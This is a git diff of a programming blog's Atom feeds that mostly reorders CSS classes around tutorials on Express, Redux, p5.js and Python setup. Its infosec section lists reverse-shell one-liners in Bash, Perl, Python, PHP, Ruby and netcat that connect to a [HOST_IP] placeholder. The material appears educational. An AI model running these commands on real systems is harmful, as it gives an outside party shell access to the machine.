    diff --git a/feeds/infosec.atom.xml b/feeds/infosec.atom.xml
    index bc93ac96..b175ae5b 100644
    --- a/feeds/infosec.atom.xml
    +++ b/feeds/infosec.atom.xml
    @@ -114,27 +114,27 @@
     </ol>
     <p>Following this are a list of commands that you could execute to get a reverse connection for different supported languages. Where the variable to change denoted by <code>[HOST_IP]</code> and optionally to change the port. Note that these are all 'one-liners' so they could be executed in input boxes.</p>
     <h4 id="bash">Bash</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>bash -i &gt;<span class="p">&amp;</span> /dev/tcp/<span class="o">[</span>HOST_IP<span class="o">]</span>/8080 <span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>bash -i &gt;<span class="p">&amp;</span> /dev/tcp/<span class="o">[</span>HOST_IP<span class="o">]</span>/8080 <span class="m">0</span>&gt;<span class="p">&amp;</span><span class="m">1</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="perl">PERL</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">perl</span> <span class="o">-</span><span class="n">e</span> <span class="s">'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">perl</span> <span class="o">-</span><span class="n">e</span> <span class="s">'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="python">Python</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s1">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="php">PHP</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="x">php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="x">php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="ruby">Ruby</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">ruby</span> <span class="o">-</span><span class="n">rsocket</span> <span class="o">-</span><span class="n">e</span><span class="s1">'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">ruby</span> <span class="o">-</span><span class="n">rsocket</span> <span class="o">-</span><span class="n">e</span><span class="s1">'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="netcat">Netcat</h4>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>nc -e /bin/sh <span class="o">[</span>HOST_IP<span class="o">]</span> <span class="m">8080</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>nc -e /bin/sh <span class="o">[</span>HOST_IP<span class="o">]</span> <span class="m">8080</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h3 id="local-file-inclusion">Local File Inclusion</h3>
    @@ -144,7 +144,7 @@
     <ol>
     <li>create a php file with the following:</li>
     </ol>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/javascript.atom.xml b/feeds/javascript.atom.xml
    index 7f4fc919..6b4b45d6 100644
    --- a/feeds/javascript.atom.xml
    +++ b/feeds/javascript.atom.xml
    @@ -4,7 +4,7 @@
     <p>Next in the <code>draw</code> function, which is repeatedly called while the browser has the page open, we loop through all the objects in the array and draw a circle (ellipse with equal radii) and colour it according to how big it's radius is (this is as to watch it fade as it grows). We make use of the <code>stroke</code> function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop, if it's still undersize we increase it's radius and colour.</p>
     <p>Finally to add interactivity, we make use of the <code>mouseIsPressed</code> variable to determine if the user has clicked on the visualization and add a drop into the array at the X &amp; Y position of where the user clicked.</p>
     <p align="center"><iframe frameborder="0" height="400" src="https://editor.p5js.org/JackMcKew/embed/u2ga-k6rk" width="100%"></iframe></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -118,7 +118,7 @@
     </code></pre></div>
     </td></tr></tbody></table></body>API Routes in Node.js2020-10-02T00:00:00+10:002020-10-02T00:00:00+10:00Jack McKewtag:jackmckew.dev,2020-10-02:/api-routes-in-nodejs.html<body><p>First off what's an API and more specifically what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of. This post …</p></body><body><p>First off what's an API and more specifically what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of. This post will dive into how to set up API routes in Nodejs with express.</p>
     <p>We start by 'importing' express into our route and instantiating a router from the express library.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
     <span class="kd">const</span> <span class="nx">router</span> <span class="o">=</span> <span class="nx">express</span><span class="p">.</span><span class="nx">Router</span><span class="p">();</span>
     </code></pre></div>
    @@ -163,7 +163,7 @@
     <p>These 4 methods make up the basic CRUD functionality (Create, Read, Update and Delete) of an application.</p>
     <h2 id="post">POST</h2>
     <p>Let's create a scaffold <code>POST</code> method in node.js.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="kd">function</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span><span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage'</span><span class="p">);</span>
    @@ -171,7 +171,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Similarly to do this asynchronously with arrow functions:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span><span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage'</span><span class="p">);</span>
    @@ -179,7 +179,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>As we can see above, the first argument to our API route method is the path, and the following is the callback function (what should happen when this path is hit). The callback function can be a function, array of functions, series of functions (separated by commas), or a combination of all of them. This is useful if you are wanting to do validation before the final POST request is made. An example of this is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,[</span><span class="nx">checkInputs</span><span class="p">()],</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'POST request to homepage and inputs are valid'</span><span class="p">);</span>
    @@ -188,7 +188,7 @@
     </td></tr></tbody></table>
     <h2 id="get">GET</h2>
     <p>All the methods within Express.js follow the same principles so to create a scaffold <code>GET</code> request:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'GET request to homepage'</span><span class="p">);</span>
    @@ -197,7 +197,7 @@
     </td></tr></tbody></table>
     <h2 id="put">PUT</h2>
     <p>Similarly:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="nx">put</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'PUT request to homepage'</span><span class="p">);</span>
    @@ -206,7 +206,7 @@
     </td></tr></tbody></table>
     <h2 id="delete">DELETE</h2>
     <p>Similarly:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nx">router</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span><span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=&gt;</span> <span class="p">{</span>
         <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'PUT request to homepage'</span><span class="p">);</span>
    @@ -238,7 +238,7 @@
     </tbody>
     </table>
     <p>An example of using all of the arguments is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -255,14 +255,14 @@
     <p><img alt="Redux State Diagram" class="img-fluid" src="https://jackmckew.dev/img/redux-diagram.png"/></p>
     <p>Let's use <code>react-redux</code> to build a system which we can alert users when things trigger. For this we will need to build an action, a reducer and a component to display the alert.</p>
     <p>To ensure that these three components are speaking the same language, we need to initialise types which will represent the states being passed around. These variables contain a string. For our alert system we need two variables</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">export</span> <span class="kd">const</span> <span class="nx">SET_ALERT</span> <span class="o">=</span> <span class="s2">"SET_ALERT"</span>
     <span class="k">export</span> <span class="kd">const</span> <span class="nx">REMOVE_ALERT</span> <span class="o">=</span> <span class="s2">"REMOVE_ALERT"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="action">Action</h2>
     <p>We'll start by creating the action which will signify when an alert is triggered. We want all of our alerts to be unique so multiple alerts can handled without a problem which we will use <code>uuid</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -305,7 +305,7 @@
     </td></tr></tbody></table>
     <p>The action is declared as a function, which takes in 3 arguments (2 required): <code>msg</code>, <code>alertType</code> and <code>timeout</code>. Which we then use call the dispatch function with an object constructed from the arguments, and then after a specified timeout we dispatch another object to remove the same alert.</p>
     <p>Note that we curry the dispatch function in this case, this is only possible from using the middleware <code>redux-thunk</code>, which can also be represented as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -323,7 +323,7 @@
     <blockquote>
     <p>This post won't go into detail around how to build a React component, which you can find over at another post: [INSERT REACT COMPONENT POST]</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -371,7 +371,7 @@
     <p>To break it down, we've created a React component (class) <code>Alert</code> which takes in <code>alerts</code> as an array, verifies it isn't null or empty, and finally iterates over each element in the <code>alerts</code> array to return a <code>div</code> stylized with the appropriate information.</p>
     <h2 id="reducer">Reducer</h2>
     <p>Lastly we have the reducer which we want to handle all the states that can be created by the <code>alert</code> action. Luckily we can do this with a switch statement:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -419,7 +419,7 @@
     </blockquote>
     <p>Let's create a file <code>Landing.js</code> (similarly could be named <code>Landing.jsx</code> for react specific file extension, <code>Landing.ts</code> for TypeScript or <code>Landing.tsx</code> for both react specific extension with TypeScript). This is followed by by importing all the necessary requirements for our javascript file.</p>
     <h2 id="import-requirements">Import Requirements</h2>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">import</span> <span class="nx">React</span> <span class="nx">from</span> <span class="s2">"react"</span><span class="p">;</span>
    @@ -434,7 +434,7 @@
     <p><code>PropTypes</code> is a way of implementing runtime type checking for React props. If TypeScript is used for the project, this is somewhat extra type checking, which we can never have enough of!</p>
     <h2 id="the-component">The Component</h2>
     <p>Now that we've imported everything that we need, it's time to actually create the component! A component in React is a function, where the props are the inputs and the element to be rendered is the return statement. We do this with an arrow function (aka Lambda function) for clarity.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -492,7 +492,7 @@
     <blockquote>
     <p>This post is not intended to go through how to set up the redux store or interactions with it.</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -507,7 +507,7 @@
     <h2 id="conclusion">Conclusion</h2>
     <p>Now we can use the statement <code>import Landing from './Landing'</code> and use our component similar to that of <code>Link</code> in our app!</p>
     <p>The full source of <code>Landing.js</code> is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/machine-learning.atom.xml b/feeds/machine-learning.atom.xml
    index 40b2d28c..8f86b4c1 100644
    --- a/feeds/machine-learning.atom.xml
    +++ b/feeds/machine-learning.atom.xml
    @@ -191,7 +191,7 @@ Book's answer: Cross-validation is a technique that makes it possible to compare
     </ul>
     <h3 id="supervised-learning">Supervised Learning</h3>
     <p>Most practical machine learning algorithms use supervised learning. Supervised learning is where you have one or more input variables (x) and output variable(s) (y), and you use an algorithm to learn the mapping function from the input to the output.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>y = f(x)
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>y = f(x)
     </code></pre></div>
     </td></tr></tbody></table>
     <p>The end goal of this algorithm is to approximate the mapping function accurately such that then you have a new data input (x), you can predict what the result (y) for that data would be.</p>
    diff --git a/feeds/principles.atom.xml b/feeds/principles.atom.xml
    index 0b082225..a221bc42 100644
    --- a/feeds/principles.atom.xml
    +++ b/feeds/principles.atom.xml
    @@ -23,7 +23,7 @@
     <p>Now once these are installed (if you put them in the default location), Python will default to be located in: C:\Users\Jack\AppData\Local\Programs\Python\Python37-32. For the next few steps to ensure we are setting up virtual environments for our projects open command prompt here if you are on windows. This will look something like this:</p>
     <p><img alt="image-11.png" class="img-fluid" src="https://jackmckew.dev/img/image-11.png"/></p>
     <p>The 'cd' command in windows (and other OS) stands for change directory, follow this with a path and you will be brought to that directory. Next whenever I first install Python I like to update pip to it's latest release, to do this use the command in this window:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>python -m pip install --upgrade pip
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>python -m pip install --upgrade pip
     </code></pre></div>
     </td></tr></tbody></table>
     <p>With pip upgraded to it's current release, it's time to install some very helpful packages for setting up projects: virtualenv and cookiecutter. To install these navigate to the the Scripts folder within the current directory with cd ('cd Scripts') and run 'pip.exe install virtualenv cookiecutter', pip will then work it's magic and install these packages for you.</p>
    @@ -39,24 +39,24 @@ Now something that I personally like to do is add this folder to your system env
     <p>If you chose to do this step, you will now be able to create virtual environments and cookiecutter templates without having to specify the directory to the executables.</p>
     <p>It's now time to create a project from scratch. So navigate to where you like to keep your projects (mostly mine is in Documents\Github\) but you can put them anywhere you like. Now run command prompt again (or keep the one you have open) and navigate to the dedicated folder (or folders) using cd.</p>
     <p>For most of my projects lately being of data science in nature, I like to use the cookiecutter-data-science template which you can find all the information about here: <a href="https://drivendata.github.io/cookiecutter-data-science/">https://drivendata.github.io/cookiecutter-data-science/</a>. To then create a project it is as simple as running:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>cookiecutter https://github.com/drivendata/cookiecutter-data-science
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>cookiecutter https://github.com/drivendata/cookiecutter-data-science
     </code></pre></div>
     </td></tr></tbody></table>
     <p><img alt="image-3.png" class="img-fluid" src="https://jackmckew.dev/img/image-3.png"/></p>
     <p>Provide as much information as you wish into the questions and you will now have a folder created wherever you ran the command with all the relevant sections from the template.</p>
     <p>Whenever starting a new Python project, my personal preference is to keep the virtual environment within the directory, however this is not always a normal practice. To create a virtual environment for our Python packages, navigate into the project and run (if you added Scripts to your Path):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>virtualenv env
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>virtualenv env
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This will then initialise a folder within your current directory to install a copy of Python and all it's relevant tools with a folder ('env').</p>
     <p>Before we go any further, this is the point that I like to initialise a git repository. To do this, run git init from your command line from within the project directory.</p>
     <p>Now to finish off the final steps of the workflow that will affect the day-to-day development, I like to use pre-commit hooks to reformat my with black and on some projects check for PEP conformance with flake8 on every commit to my projects repository. This is purely a personal preference on how you would like to work, others like to use pytest and more to ensure their projects are working as intended, however I am not at that stage just yet.</p>
     <p>To install these pre-commits into our workflow, firstly initialise the virtual environment from within our project by navigating to env/Scripts/activate.bat. This will activate your project's Python package management system and runtime, following this you can install packages from pip and otherwise. For our pre-commits we install the package 'pre-commit':</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install pre-commit
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install pre-commit
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Following this to set up the commit hooks create a '.pre-commit-config.yaml' within your main project directory. This is where we will specify what hooks we would like to run before being able to commit. Below is a sample .pre-commit-config.yaml that I use in my projects:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -87,7 +87,7 @@ Now something that I personally like to do is add this folder to your system env
     <p>On the default cookiecutter data science template with the settings as per above this will show on the pre-commit run (after you have staged changes in git (use git add -A for all)):</p>
     <p><img alt="image-4.png" class="img-fluid" src="https://jackmckew.dev/img/image-4.png"/></p>
     <p>We can see a different opinions in code formatting appearing already from flake8's output. The black code formatter in Python's code length is 88 characters , not 79 like PEP8. So we will add a pyproject.toml to the project directory where we can specify settings within the black tool:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -123,7 +123,7 @@ Now something that I personally like to do is add this folder to your system env
     </code></pre></div>
     </td></tr></tbody></table>
     <p>For any flake8 specific settings (such as error codes to ignore), we can set a .flake8 file in the project directory as well, which may look like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/python.atom.xml b/feeds/python.atom.xml
    index 06e72e8a..0e1d51e7 100644
    --- a/feeds/python.atom.xml
    +++ b/feeds/python.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should've been done and been able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
